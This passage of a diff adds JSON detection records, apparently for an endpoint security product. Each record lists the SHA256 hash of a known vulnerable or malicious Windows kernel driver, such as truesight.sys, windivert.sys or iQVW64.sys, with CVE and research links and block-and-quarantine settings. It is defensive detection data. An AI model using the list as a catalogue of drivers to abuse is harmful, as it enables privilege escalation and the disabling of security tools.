"rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9ca586b49135166eea00c6f83329a2d134152e0e9423822a51c13394265b6340", + "comment": "Vulnerable Kernel Driver (aka elbycdio.sys) [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ea4e71a1-fedc-5dfa-baec-634bfd0ce84d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.829301Z", + "creation_date": "2026-03-23T11:45:31.829305Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.829314Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "723b21973a67f54ac06570f3e8dabebc5feb346a478becc16093c3d76cf67200", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ea4ee273-ed33-5c08-b850-cd8a2daa4ad2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + 
"source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.144670Z", + "creation_date": "2026-03-23T11:45:32.144672Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.144678Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2f43f4251be4d72dd56c91bf6cce475d379eb9ba6c4dda2be3022ea633d5e807", + "comment": "Malicious Kernel Driver (aka windivert.sys) [https://www.loldrivers.io/drivers/45a31a17-f78d-48ec-beba-74f6bfc5f96e/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ea5ca6dd-98ca-5d69-ab28-6637260b6945", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.816782Z", + "creation_date": "2026-03-23T11:45:31.816786Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.816794Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7a531eba3777600578d44166c38161efa9099a994fb80156ef605f4d2cd4025c", + "comment": "Vulnerable Adlice Software 
Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ea61d637-69a7-54d6-a938-7203bd836008", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.141345Z", + "creation_date": "2026-03-23T11:45:31.141347Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.141352Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d60bd5f693f32e13add78e5afb7f733fbe031afa66d93b37eb71afa3542059b1", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ea6816bd-cf40-5d2f-b1cc-77ff5bf6792a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", 
+ "last_update": "2026-03-23T11:45:29.613989Z", + "creation_date": "2026-03-23T11:45:29.613991Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.613996Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bb1135b51acca8348d285dc5461d10e8f57260e7d0c8cc4a092734d53fc40cbc", + "comment": "Huawei vulnerable drivers (aka HwOs2Ec10x64.sys and HwOs2Ec7x64.sys) [CVE-2019-5241] [https://www.microsoft.com/security/blog/2019/03/25/from-alert-to-driver-vulnerability-microsoft-defender-atp-investigation-unearths-privilege-escalation-flaw/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ea749a9a-c1dd-59b1-a78a-75dd6502ed98", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.157067Z", + "creation_date": "2026-03-23T11:45:31.157069Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.157074Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d3a55aba512689dcac863c407406500e51c2fc6a50235debdca38d70a174eada", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ea74dc83-cace-5bb4-9440-2f62eb547b20", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.836717Z", + "creation_date": "2026-03-23T11:45:30.836720Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.836725Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7dbca9a9907d361d4ccf6883644fee00f5d13436bedfd27598fe07ee1683f6ee", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ea7e0beb-6f99-5ccf-b96c-d85b5be78d10", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.828820Z", + "creation_date": 
"2026-03-23T11:45:31.828822Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.828827Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ef2bcf2525e7512880825629aa38263bd8b836dfafdf2caf84963486c9be4bed", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ea7f9e9d-e283-5722-bd3c-8539f49b3086", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.153789Z", + "creation_date": "2026-03-23T11:45:31.153791Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.153796Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e8109fb3d71bf47d43e8715d5362e526cd08d023aa606eb75e39a7b2e5d3e879", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ 
+ "id": "ea899b1c-8c79-5514-b746-89f9c9719bac",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.140064Z",
+ "creation_date": "2026-03-23T11:45:31.140068Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.140077Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1d976f2023dfabea845fea85ab7427c3293196bae53ea20efb2ba1e08fb492b5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ea8b8667-a624-5a33-82ea-88cae4c83610",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.816099Z",
+ "creation_date": "2026-03-23T11:45:30.816101Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": 
"stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.816107Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "dba8db472e51edd59f0bbaf4e09df71613d4dd26fd05f14a9bc7e3fc217a78aa",
+ "comment": "Vulnerable Kernel Driver (aka sysconp.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ea91ff8d-4a04-50c2-8e29-e5f4d67e7ff5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.972405Z",
+ "creation_date": "2026-03-23T11:45:29.972407Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.972412Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e80597ea0d75e9198428c81ca5b4495bf11922dd29852a0a2e63998e36857746",
+ "comment": "Intel Ethernet diagnostics vulnerable driver (aka iQVW64.sys) [CVE-2015-2291] [https://www.loldrivers.io/drivers/1d2cdef1-de44-4849-80e5-e2fa288df681/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "eaa010e5-8994-5f69-a730-bbca1c3fb08d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ 
"rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.155310Z",
+ "creation_date": "2026-03-23T11:45:31.155312Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.155317Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b9582cac23cf8bd3a3d66c09195ab6b0389b3fe35490e3a4db97f6338dfe3948",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "eab9a02f-ff01-5a0e-b710-59ec18ab51d1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.151469Z",
+ "creation_date": "2026-03-23T11:45:31.151472Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.151481Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": 
"hash",
+ "value": "4b34749d344404ea726643fdca9c68fe7fca58bf17d2baf57afacd1f5654793c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "eac1fe17-9270-5699-81aa-2a6df35254d3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.473184Z",
+ "creation_date": "2026-03-23T11:45:30.473187Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.473196Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6c5c6c350c8dd4ca90a8cca0ed1eeca185ebc67b1100935c8f03eb3032aca388",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "eac65c31-301b-5b9c-9927-aea3d0796874",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": 
"system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.606043Z",
+ "creation_date": "2026-03-23T11:45:29.606045Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.606050Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3503ea284b6819f9cb43b3e94c0bb1bf5945ccb37be6a898387e215197a4792a",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "eac65cde-7450-5f8e-ad5c-ad17591f0cad",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.816711Z",
+ "creation_date": "2026-03-23T11:45:30.816713Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.816719Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1076504a145810dfe331324007569b95d0310ac1e08951077ac3baf668b2a486",
+ "comment": "Vulnerable Kernel Driver (aka tdeio64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "eac97563-a472-5e56-92c7-63d7fa9c6a8a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.617466Z",
+ "creation_date": "2026-03-23T11:45:29.617468Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.617473Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d2182b6ef3255c7c1a69223cd3c2d68eb8ba3112ce433cd49cd803dc76412d4b",
+ "comment": "ATI Technologies vulnerable GPU flash tool (aka atillk64.sys) [CVE-2020-12138] [https://www.loldrivers.io/drivers/61514cbd-6f34-4a3e-a022-9ecbccc16feb/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "eaca3cc5-3554-5b31-a3ad-b72ea6126aea",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.473266Z",
+ "creation_date": "2026-03-23T11:45:31.473270Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ 
"hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.473279Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4af90ad45d4ddde16668ee510cea281c2b82ec1dd3781b091eb3769e76a6a54e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "eacfa977-21a7-582c-a8a0-524f45888ad4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.153718Z",
+ "creation_date": "2026-03-23T11:45:31.153720Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.153726Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "079eb5d41b6caeb7ca008b3b22a1219fbb76a14327401071bd04fdc05d6e3301",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ead387ba-dcb9-55c2-a59c-aefc236565c2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ 
"test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.835720Z",
+ "creation_date": "2026-03-23T11:45:30.835722Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.835727Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "80025dbd57fa67b9753652f1bedf4405cfd85e397f470a1cb820deedab1c9666",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ead912e0-3976-5b16-8a15-23ead6cf9af1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.489196Z",
+ "creation_date": "2026-03-23T11:45:31.489198Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.489203Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "70f812f516906f4af9a2be348c4ed2f49589cfeddfa1d05b3863b0794d61178d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "eae2f9fd-8894-573b-9b08-d27c448fd766",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.970106Z",
+ "creation_date": "2026-03-23T11:45:29.970108Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.970113Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
